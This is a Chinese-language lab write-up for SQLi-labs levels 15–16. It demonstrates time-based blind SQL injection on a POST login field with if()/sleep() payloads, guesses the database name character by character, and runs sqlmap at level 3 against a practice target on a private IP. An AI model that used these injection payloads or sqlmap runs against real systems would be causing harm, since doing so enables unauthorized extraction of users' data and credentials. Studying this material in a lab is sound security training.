前言:在第九关我们已经了解过GET方式的盲注,我们今天一起探讨下POST方式的盲注。
第15关
http://192.168.89.134/sqli-labs-master/Less-15/
我们在尝试了,联合查询和报错注入方式后无果,我们初步判断为盲注
我们看下源代码:
猜想正确
我们采用延迟盲注(时间注入主要用 if(表达式1,表达式2,表达式3) 函数与sleep() 函数配合使用。if函数原理是当表达式1为True时,返回值为表达式二,否则返回表达式三。)
admin’ and if(length(database()=8),sleep(5),1) #
这句话意思就是 如果条件成立,就停止5秒
看这延迟5秒中,说明猜想数据库8位正确
我们继续猜解库名
admin’ and if(substr(database(),1,1)=‘s’,sleep(5),1)–+
admin’ and if(substr(database(),2,1)=‘e’,sleep(5),1)–+
admin’ and if(substr(database(),3,1)=‘c’,sleep(5),1)–+
admin’ and if(substr(database(),4,1)=‘u’,sleep(5),1)–+
admin’ and if(substr(database(),5,1)=‘r’,sleep(5),1)–+
admin’ and if(substr(database(),6,1)=‘i’,sleep(5),1)–+
admin’ and if(substr(database(),7,1)=‘t’,sleep(5),1)–+
admin’ and if(substr(database(),8,1)=‘y’,sleep(5),1)–+
像这样继续猜解不断尝试
如果想进一步得到用户、密码信息,继续不断猜解…
反正盲注很麻烦并且浪费时间!
第十六关
把admin’换成admin’’)其他的步骤都一样
我们用sqlmap去验证
在这里有一点需要和大家强调的
我们用昨天的命令:
sqlmap -r 15.txt
说没扫描出来,我查阅了一些资料sqlmap默认的注入能力是level=1,我们改成3
sqlmap -r 15.txt --level=3
提示我们有基于时间的盲注还有版本信息
接下来都一样,我省略一些步骤,直接看结果
这次真的好慢,可能是因为我们级别调成3
总结:经过了POST方式盲注基本和GET方式相同,换汤不换药。
本文章为自己搭建实验环境做过的,参考过一些资料,希望对你有帮助
